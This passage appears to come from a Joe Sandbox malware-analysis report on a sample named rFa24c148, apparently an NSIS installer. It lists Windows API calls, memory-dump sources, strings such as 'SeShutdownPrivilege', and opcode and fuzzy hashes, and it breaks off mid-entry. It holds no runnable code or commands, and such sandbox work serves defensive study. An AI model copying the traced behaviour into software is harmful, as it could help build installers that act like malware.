                                                                                              • SetWindowLongW.USER32(?,000000FC,00404F95), ref: 00404A36
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A4A
                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A5C
                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404A72
                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A7E
                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A90
                                                                                              • DeleteObject.GDI32(00000000), ref: 00404A93
                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404ABE
                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ACA
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B60
                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404B8B
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B9F
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404BCE
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BDC
                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404BED
                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CEA
                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D4F
                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D64
                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D88
                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DA8
                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404DBD
                                                                                              • GlobalFree.KERNEL32(?), ref: 00404DCD
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E46
                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00404EEF
                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404EFE
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F1E
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404F6C
                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404F77
                                                                                              • ShowWindow.USER32(00000000), ref: 00404F7E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                              • String ID: $M$N
                                                                                              • API String ID: 1638840714-813528018
                                                                                              • Opcode ID: 6bbd20c2702cab14f23fe9ea8e39145f8db2335003c0fea9fe145592dcc537c1
                                                                                              • Instruction ID: f03e607a396e187e7a88a72d0c11c4872557c7a4ae09ea9be525cead3dabdd13
                                                                                              • Opcode Fuzzy Hash: 6bbd20c2702cab14f23fe9ea8e39145f8db2335003c0fea9fe145592dcc537c1
                                                                                              • Instruction Fuzzy Hash: A90294B0900209EFEB209F55DD45AAE7BB5FB84314F10817AF610B62E0C7799D52CF58
                                                                                              APIs
                                                                                              • #17.COMCTL32 ref: 0040321E
                                                                                              • SetErrorMode.KERNEL32(00008001), ref: 00403229
                                                                                              • OleInitialize.OLE32(00000000), ref: 00403230
                                                                                                • Part of subcall function 004060E1: GetModuleHandleA.KERNEL32(?,?,00000020,00403242,00000008), ref: 004060F3
                                                                                                • Part of subcall function 004060E1: LoadLibraryA.KERNEL32(?,?,00000020,00403242,00000008), ref: 004060FE
                                                                                                • Part of subcall function 004060E1: GetProcAddress.KERNEL32(00000000,?), ref: 0040610F
                                                                                              • SHGetFileInfoW.SHELL32(00420658,00000000,?,000002B4,00000000), ref: 00403258
                                                                                                • Part of subcall function 00405D77: lstrcpynW.KERNEL32(?,?,00000400,0040326D,004281A0,NSIS Error), ref: 00405D84
                                                                                              • GetCommandLineW.KERNEL32(004281A0,NSIS Error), ref: 0040326D
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 00403280
                                                                                              • CharNextW.USER32(00000000,00434000,00000020), ref: 004032A7
                                                                                              • GetTempPathW.KERNEL32(00000400,00436800,00000000,00000020), ref: 004033B0
                                                                                              • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 004033C1
                                                                                              • lstrcatW.KERNEL32(00436800,\Temp), ref: 004033CD
                                                                                              • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 004033E1
                                                                                              • lstrcatW.KERNEL32(00436800,Low), ref: 004033E9
                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 004033FA
                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 00403402
                                                                                              • DeleteFileW.KERNEL32(00436000), ref: 00403416
                                                                                              • OleUninitialize.OLE32(?), ref: 004034C6
                                                                                              • ExitProcess.KERNEL32 ref: 004034E6
                                                                                              • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 004034F2
                                                                                              • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 004034FE
                                                                                              • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 0040350A
                                                                                              • SetCurrentDirectoryW.KERNEL32(00436800), ref: 00403511
                                                                                              • DeleteFileW.KERNEL32(0041FE58,0041FE58,?,0042A000,?), ref: 0040356B
                                                                                              • CopyFileW.KERNEL32(00437800,0041FE58,00000001), ref: 0040357F
                                                                                              • CloseHandle.KERNEL32(00000000,0041FE58,0041FE58,?,0041FE58,00000000), ref: 004035AC
                                                                                              • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 00403602
                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 0040363E
                                                                                              • ExitProcess.KERNEL32 ref: 00403661
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                              • String ID: Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                              • API String ID: 4107622049-400301585
                                                                                              • Opcode ID: 5f888993f7591d88a1aa95b3916d1730fdea01f6f4b4de511722319dd3018d9c
                                                                                              • Instruction ID: ad4a0f84636c0b66377e35c31726649c2eaf1ae8fb353dd82aac126218056701
                                                                                              • Opcode Fuzzy Hash: 5f888993f7591d88a1aa95b3916d1730fdea01f6f4b4de511722319dd3018d9c
                                                                                              • Instruction Fuzzy Hash: 99B1D030904210BAD7207F629D49A7B3EACEB45706F40497FF441B62E2D7BC9941CB6E
                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(?,?,00436800,74DF3420,00434000), ref: 00405628
                                                                                              • lstrcatW.KERNEL32(004246A0,\*.*,004246A0,?,?,00436800,74DF3420,00434000), ref: 00405670
                                                                                              • lstrcatW.KERNEL32(?,00409014,?,004246A0,?,?,00436800,74DF3420,00434000), ref: 00405693
                                                                                              • lstrlenW.KERNEL32(?,?,00409014,?,004246A0,?,?,00436800,74DF3420,00434000), ref: 00405699
                                                                                              • FindFirstFileW.KERNEL32(004246A0,?,?,?,00409014,?,004246A0,?,?,00436800,74DF3420,00434000), ref: 004056A9
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405749
                                                                                              • FindClose.KERNEL32(00000000), ref: 00405758
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 2035342205-1173974218
                                                                                              • Opcode ID: 39a4ac77881b5eb5dcd31ca450c1c753a4ca1d38c3ea398be78b80407868f71b
                                                                                              • Instruction ID: b79195ecc2de65d8d99f91511e5e2c7060301b719c54f9eae921112220d3ef15
                                                                                              • Opcode Fuzzy Hash: 39a4ac77881b5eb5dcd31ca450c1c753a4ca1d38c3ea398be78b80407868f71b
                                                                                              • Instruction Fuzzy Hash: 2C41CF30901A14F6DB216B618C89EAF7678EF45724F60457BF804721D1D77C89C1EE6E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b5652d2671bdba289ad27ff2dbd2e251a3084f56fb371cc4bb45df86323f9214
                                                                                              • Instruction ID: 3bb9d82cab8560ee02f1719a45e7f61305cf8b7accb1ce145186acec9c03a25a
                                                                                              • Opcode Fuzzy Hash: b5652d2671bdba289ad27ff2dbd2e251a3084f56fb371cc4bb45df86323f9214
                                                                                              • Instruction Fuzzy Hash: B6F17870D04229CBDF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00436800,004256E8,00424EA0,00405913,00424EA0,00424EA0,00000000,00424EA0,00424EA0,00436800,?,74DF3420,0040561F,?,00436800,74DF3420), ref: 004060C5
                                                                                              • FindClose.KERNEL32(00000000), ref: 004060D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID: VB
                                                                                              • API String ID: 2295610775-2416070386
                                                                                              • Opcode ID: 0d7890576d52439fda81d3ff5c831c2ea13596096c8ebb05fd3cc094a7cb3954
                                                                                              • Instruction ID: f9ddfc5d4f3467e36225d2e4908305aa5d63d15eb4a774a72597514f161c5606
                                                                                              • Opcode Fuzzy Hash: 0d7890576d52439fda81d3ff5c831c2ea13596096c8ebb05fd3cc094a7cb3954
                                                                                              • Instruction Fuzzy Hash: 95D012719890309BC2105B386D0C84B7A589F153317528F73F42AF23E0C7388C6596AD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .5vq
                                                                                              • API String ID: 0-493797296
                                                                                              • Opcode ID: 2cc07ed454ae54e71009bac0fd72c49bf56983b4d9addb48d2a78e597f5ec672
                                                                                              • Instruction ID: 0b05c755835943c0bb878c44d0ec74961b98e32bcacf2e53450d244e6eff854a
                                                                                              • Opcode Fuzzy Hash: 2cc07ed454ae54e71009bac0fd72c49bf56983b4d9addb48d2a78e597f5ec672
                                                                                              • Instruction Fuzzy Hash: E2529B74E01228CFEB64DF69C884B9DBBB2BB89301F1085EAD509A7355DB359E81CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996281407.0000000036550000.00000040.00000800.00020000.00000000.sdmp, Offset: 36550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_36550000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d0e2888fbfbd8b96ffbcbde58b961ecc3e74ec1a45daf01403dfd7cd8bdbeb02
                                                                                              • Instruction ID: ee41e1866cf096f964b6f14ec84731d400c1f7967ec73aa911b4c3cb2d99dbde
                                                                                              • Opcode Fuzzy Hash: d0e2888fbfbd8b96ffbcbde58b961ecc3e74ec1a45daf01403dfd7cd8bdbeb02
                                                                                              • Instruction Fuzzy Hash: BC72BE74E012288FEB64DF69C994BD9BBB2BB49304F1585EAD50DA7351DB30AE81CF40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 368d424f02652a36d660dc6818b5aadcf3cffeca4631621c66810cff8a49559c
                                                                                              • Instruction ID: fe29155c6e333cf84cb6d68a8778fb30fc91031b87c1cbc489b8f945983ef7a6
                                                                                              • Opcode Fuzzy Hash: 368d424f02652a36d660dc6818b5aadcf3cffeca4631621c66810cff8a49559c
                                                                                              • Instruction Fuzzy Hash: 6FE1CEB4E01228CFEB24CFA5C944B9DBBB2BF89300F6080A9D519BB355DB355A85CF15
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 84fe3271bfacccad3bc06d78939204f98dc9fe829fdfc715313010237570657a
                                                                                              • Instruction ID: 3a2326b9afd1b3c06ca7cd515d8151d87d565eb4c8c33498cd6f1fe0e716d046
                                                                                              • Opcode Fuzzy Hash: 84fe3271bfacccad3bc06d78939204f98dc9fe829fdfc715313010237570657a
                                                                                              • Instruction Fuzzy Hash: 8FD1AE74E012288FEB14DFA5C994B9DBBB2FF89300F6081A9D409AB354DB359E81CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5a1899495f7a78116efa2aa8d29c22915d1b28ced31dc2e1b400c6513b7c4f6f
                                                                                              • Instruction ID: 5798320c3b7f4845a76155950c214b06748d0fc2fd58e0ca67cf7d578b8ff992
                                                                                              • Opcode Fuzzy Hash: 5a1899495f7a78116efa2aa8d29c22915d1b28ced31dc2e1b400c6513b7c4f6f
                                                                                              • Instruction Fuzzy Hash: 08D1BE74E002288FEB54DFA5C994B9DBBB2FF89300F6081A9D409AB354DB359E81CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7e06981580108fb7de30a4bd474b2c1e832ccb283d2f12d6429d110955a78e58
                                                                                              • Instruction ID: a0a05e9454d21fbd24c37c021f241800fe71f418214bbf5438c1faa310a42b95
                                                                                              • Opcode Fuzzy Hash: 7e06981580108fb7de30a4bd474b2c1e832ccb283d2f12d6429d110955a78e58
                                                                                              • Instruction Fuzzy Hash: 3AD1BF74E01228CFEB14DFA5C984B9DBBB2BF89300F6081A9D409AB354DB359E81CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 10f4c3ef08ef42d3b880fe7f59c6d24b1769823b8c17a8f3f2fe03f6ad92793c
                                                                                              • Instruction ID: 425a8bc8e063efae708cd76d0ea1f885d9920d13957963c919edfd683511e549
                                                                                              • Opcode Fuzzy Hash: 10f4c3ef08ef42d3b880fe7f59c6d24b1769823b8c17a8f3f2fe03f6ad92793c
                                                                                              • Instruction Fuzzy Hash: 23D1A074E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB354DB359E81CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 618a575b4e7fd27700f1f3533ff62ffdf304c96faa9612cd8a771511dd924e0c
                                                                                              • Instruction ID: 1cd8246d1f590467a9e7c2dc9956ae28490af334041d6d87c7b8c30fa7b5384d
                                                                                              • Opcode Fuzzy Hash: 618a575b4e7fd27700f1f3533ff62ffdf304c96faa9612cd8a771511dd924e0c
                                                                                              • Instruction Fuzzy Hash: 67D1A074E00218CFEB14DFA5C994B9DBBB2BF89300F6081AAD409AB354DB359E81CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2aec38d9dfe8cef8229cbdb8c75b49578f5a150e5af83550f2c007e311a81ab2
                                                                                              • Instruction ID: a155cf7eb6a69f06c47db1373a79bcc83e45c385b1b61e2f7acfec86537739a0
                                                                                              • Opcode Fuzzy Hash: 2aec38d9dfe8cef8229cbdb8c75b49578f5a150e5af83550f2c007e311a81ab2
                                                                                              • Instruction Fuzzy Hash: 73D1AE74E012288FEB54DFA5C994B9DBBB2BF89300F6081A9D409AB354DB359E81CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6eed1896e958a879e0804af3c0c7f461bf7b6611690b18853e5749232f79b7bb
                                                                                              • Instruction ID: 96c8a63ec68dcd471ed161a26675735f8976eccd158b5fc8f96c05bc50c1458b
                                                                                              • Opcode Fuzzy Hash: 6eed1896e958a879e0804af3c0c7f461bf7b6611690b18853e5749232f79b7bb
                                                                                              • Instruction Fuzzy Hash: 40D1AE74E012288FEB14DFA5C994B9DBBB2FF89300F6081A9D509AB354DB359E81CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7e59c892ad60af60cb9e3bfa2de861a25473fc4935c3cd132edb224b68bab00c
                                                                                              • Instruction ID: 6317190a8c6df95937524a4a18c3f8e54a5836645e23f4ee076a5ad517580b24
                                                                                              • Opcode Fuzzy Hash: 7e59c892ad60af60cb9e3bfa2de861a25473fc4935c3cd132edb224b68bab00c
                                                                                              • Instruction Fuzzy Hash: 21D1B074E01228CFEB54DFA5C894B9DBBB2BF89300F6081A9D409AB354DB359E81CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dc6fd639c8b235985f5281aaddeaa4e5da7dc4e56298c1219adc01c6fbcb6f16
                                                                                              • Instruction ID: ed3b302abcaea11afc5ed3e30b6163a30c3b616f3256dd5705f7e687a5408c4a
                                                                                              • Opcode Fuzzy Hash: dc6fd639c8b235985f5281aaddeaa4e5da7dc4e56298c1219adc01c6fbcb6f16
                                                                                              • Instruction Fuzzy Hash: E9D1AE74E002288FEB14DFA5C994B9DBBB2FF89300F6081A9D409AB354DB359E81CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0bc84c1815650f3c880f4990aff70a19d8e280abe08206ae630cb4684b247505
                                                                                              • Instruction ID: 6b52e2ed6b97b4f41e64661b453018de51faf75de9932541760eb3db52434360
                                                                                              • Opcode Fuzzy Hash: 0bc84c1815650f3c880f4990aff70a19d8e280abe08206ae630cb4684b247505
                                                                                              • Instruction Fuzzy Hash: 96D1BE74E00228CFEB54DFA5C894B9DBBB2BF89300F6081A9D509AB354DB359E81CF55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2996352158.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_367b0000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 712c52813a28816798b3d60ace5a4ff6cbaab35c6fe9d57d14cdf59cef0acfcb
                                                                                              • Instruction ID: 02d47940d1abd04678fa1a41000fd08d9a6b456bc2e0e6d4ad62a73648eb0b0d
